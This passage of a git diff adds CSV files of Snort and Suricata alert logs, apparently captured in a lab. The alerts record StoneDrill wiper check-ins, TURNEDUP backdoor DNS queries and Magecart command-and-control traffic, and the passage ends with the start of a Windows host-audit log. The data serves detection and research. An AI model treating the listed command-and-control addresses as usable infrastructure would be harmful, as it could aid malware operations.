[Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50019 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:41.490","05/28/2020-13:15:38.748253 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50010 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:41.488","05/28-13:15:37.847438 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50010 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:41.488","05/28-13:15:41.057849 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50019 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:34.487","05/28/2020-13:15:32.516049 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50002 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:34.485","05/28-13:15:32.225896 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50002 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:31.486","05/28/2020-13:15:29.953284 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49992 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:31.483","05/28-13:15:29.649923 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49992 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:28.482","05/28/2020-13:15:27.323007 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49986 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:28.481","05/28-13:15:26.987956 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49986 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:28.481","05/28/2020-13:15:24.665437 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49974 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:28.480","05/28-13:15:23.669672 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49974 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:21.478","05/28-13:15:19.935319 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49973 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:21.478","05/28/2020-13:15:20.244212 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49973 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:18.477","05/28/2020-13:15:15.437188 [**] [1:2024732:5] ET MALWARE DNS Query For TURNEDUP.Backdoor CnC (googlmail) [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {UDP} 172.16.2.2:59771 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:18.477","05/28/2020-13:15:16.780402 [**] [1:2825294:2] ETPRO MALWARE StoneDrill POST Login Request [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49971 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:18.477","05/28/2020-13:15:17.605349 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49972 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:18.477","05/28-13:15:15.437188 [**] [1:2024732:3] ET TROJAN DNS Query For TURNEDUP.Backdoor CnC (googlmail) [**] [Classification: A Network Trojan was detected] [Priority: 1] {UDP} 172.16.2.2:59771 -> 172.16.2.1:53","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:18.477","05/28-13:15:16.414374 [**] [1:2825294:1] ETPRO TROJAN StoneDrill POST Login Request [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49971 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:18.477","05/28-13:15:17.298368 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49972 -> 58.158.177.102:80","/var/log/snort/alert.fast" diff --git a/data/MW_12_NIDS.csv b/data/MW_12_NIDS.csv new file mode 100644 index 0000000..6d20fbd --- /dev/null +++ b/data/MW_12_NIDS.csv @@ -0,0 +1,83 @@ +"@timestamp",message,"log.file.path" +"May 28, 2020 @ 13:41:17.834","05/28-13:41:12.093049 [**] [1:2023883:2] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:61462 -> 172.16.2.1:53","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:41:15.585","05/28/2020-13:41:12.093049 [**] [1:2023883:3] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:61462 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:40:02.823","05/28-13:39:59.444612 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50206 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:40:02.823","05/28-13:39:59.632140 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50208 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:40:00.578","05/28/2020-13:39:59.745908 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50208 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:39:59.578","05/28/2020-13:39:59.498117 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50206 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:39:59.577","05/28/2020-13:39:58.657125 [**] [1:2012811:6] ET DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:58871 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:39:59.577","05/28/2020-13:39:59.157502 [**] [1:2012811:6] ET DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:58871 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:39:47.821","05/28-13:39:38.994202 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50204 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:39:47.821","05/28-13:39:39.127491 [**] [1:2029205:2] ET TROJAN Malicious SSL Cert (Magecart) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 37.46.135.58:443 -> 172.16.2.2:50204","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:39:44.575","05/28/2020-13:39:39.128788 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50204 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:39:44.575","05/28/2020-13:39:39.265263 [**] [1:2029205:1] ET MALWARE Malicious SSL Cert (Magecart) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 37.46.135.58:443 -> 172.16.2.2:50204","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:38:32.770","05/28-13:38:25.683470 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50185 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:38:32.770","05/28-13:38:25.682687 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50184 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:38:29.552","05/28/2020-13:38:25.746734 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50185 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:38:29.552","05/28/2020-13:38:25.819282 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50184 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:38:22.549","05/28/2020-13:38:21.797884 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50169 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:38:17.767","05/28-13:38:14.887610 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50177 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:38:17.767","05/28-13:38:14.874111 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50169 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:38:15.531","05/28/2020-13:38:14.976033 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50177 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:38:14.766","05/28-13:38:13.964255 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50169 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:38:14.766","05/28-13:38:14.125259 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50171 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:38:14.530","05/28/2020-13:38:09.301440 [**] [1:2023883:3] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:50267 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:38:14.530","05/28/2020-13:38:10.951844 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50168 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:38:14.530","05/28/2020-13:38:11.223587 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50165 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:38:14.530","05/28/2020-13:38:14.118521 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50169 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:38:14.530","05/28/2020-13:38:14.246371 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50171 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:38:11.764","05/28-13:38:09.301440 [**] [1:2023883:2] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:50267 -> 172.16.2.1:53","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:38:11.764","05/28-13:38:10.892521 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50168 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:38:11.764","05/28-13:38:10.800791 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50165 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:37:19.524","05/28/2020-13:37:10.343553 [**] [1:2023883:3] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:57355 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:37:19.524","05/28/2020-13:37:15.473310 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50145 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:37:19.524","05/28/2020-13:37:15.624963 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50144 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:37:16.734","05/28-13:37:15.355320 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50144 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:37:16.715","05/28-13:37:15.398868 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50145 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:37:13.714","05/28-13:37:10.343553 [**] [1:2023883:2] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:57355 -> 172.16.2.1:53","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:36:54.519","05/28/2020-13:36:45.918524 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50125 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:36:54.519","05/28/2020-13:36:46.494212 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50126 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:36:54.519","05/28/2020-13:36:46.755573 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50129 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:36:48.711","05/28-13:36:45.816438 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50125 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:36:48.711","05/28-13:36:46.408260 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50126 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:36:48.711","05/28-13:36:46.659132 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50129 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:36:19.507","05/28/2020-13:36:16.191893 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50105 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:36:04.505","05/28/2020-13:36:01.784548 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50110 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:36:03.705","05/28-13:35:55.787323 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50106 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:36:03.705","05/28-13:35:55.774147 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50105 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:36:03.705","05/28-13:36:01.692375 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50110 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:36:03.705","05/28-13:36:01.627700 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50105 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:35:57.498","05/28/2020-13:35:55.835121 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50105 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:57.498","05/28/2020-13:35:55.982731 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50106 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:50.495","05/28/2020-13:35:42.129976 [**] [1:2023883:3] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:55528 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:50.495","05/28/2020-13:35:42.393843 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50085 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:50.495","05/28/2020-13:35:42.477775 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50084 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:50.495","05/28/2020-13:35:46.890339 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50094 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:50.495","05/28/2020-13:35:47.141377 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50084 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:50.495","05/28/2020-13:35:47.927837 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50096 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:48.702","05/28-13:35:47.855194 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50096 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:35:47.701","05/28-13:35:46.828658 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50094 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:35:47.701","05/28-13:35:46.406582 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50084 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:35:44.700","05/28-13:35:42.129976 [**] [1:2023883:2] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:55528 -> 172.16.2.1:53","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:35:44.700","05/28-13:35:42.268678 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50085 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:35:44.700","05/28-13:35:42.190530 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50084 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:35:25.491","05/28/2020-13:35:18.064953 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50056 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:25.491","05/28/2020-13:35:18.332966 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50057 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:35:19.696","05/28-13:35:17.954714 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50056 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:35:19.696","05/28-13:35:18.228343 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50057 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:34:17.689","05/28-13:34:13.729778 [**] [1:2023883:2] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:60363 -> 172.16.2.1:53","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:34:17.689","05/28-13:34:13.890480 [**] [1:2029203:2] ET TROJAN Magecart CnC Domain Observed in DNS Query [**] [Classification: A Network Trojan was detected] [Priority: 1] {UDP} 172.16.2.2:59009 -> 172.16.2.1:53","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:34:17.689","05/28-13:34:14.010503 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50024 -> 195.20.40.139:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:34:17.689","05/28-13:34:14.845082 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50028 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:34:17.689","05/28-13:34:14.845623 [**] [1:2029204:2] ET TROJAN Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50027 -> 37.46.135.58:443","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:34:17.689","05/28-13:34:14.916978 [**] [1:2029205:2] ET TROJAN Malicious SSL Cert (Magecart) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 37.46.135.58:443 -> 172.16.2.2:50027","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:34:17.689","05/28-13:34:14.918250 [**] [1:2029205:2] ET TROJAN Malicious SSL Cert (Magecart) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 37.46.135.58:443 -> 172.16.2.2:50028","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:34:15.481","05/28/2020-13:34:13.721410 [**] [1:2012811:6] ET DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:49940 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:34:15.481","05/28/2020-13:34:13.729916 [**] [1:2023883:3] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:54746 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:34:15.481","05/28/2020-13:34:13.890480 [**] [1:2029203:1] ET MALWARE Magecart CnC Domain Observed in DNS Query [**] [Classification: A Network Trojan was detected] [Priority: 1] {UDP} 172.16.2.2:59009 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:34:15.481","05/28/2020-13:34:13.890480 [**] [1:2014169:3] ET DNS Query for .su TLD (Soviet Union) Often Malware Related [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:59009 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:34:15.481","05/28/2020-13:34:14.192921 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50024 -> 195.20.40.139:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:34:15.481","05/28/2020-13:34:14.917195 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50027 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:34:15.481","05/28/2020-13:34:14.918585 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50028 -> 37.46.135.58:443","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:34:15.481","05/28/2020-13:34:15.045785 [**] [1:2029205:1] ET MALWARE Malicious SSL Cert (Magecart) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 37.46.135.58:443 -> 172.16.2.2:50028","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:34:15.481","05/28/2020-13:34:15.045756 [**] [1:2029205:1] ET MALWARE Malicious SSL Cert (Magecart) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 37.46.135.58:443 -> 172.16.2.2:50027","/var/log/suricata/fast.log" diff --git a/data/MW_14_HIDS_1.csv b/data/MW_14_HIDS_1.csv new file mode 100644 index 0000000..ae4b3f7 --- /dev/null +++ b/data/MW_14_HIDS_1.csv @@ -0,0 +1,403 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 4, 2020 @ 16:16:38.695",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed", +"Apr 4, 2020 @ 16:12:27.693",8,"Windows Audit Policy changed", +"Apr 4, 2020 @ 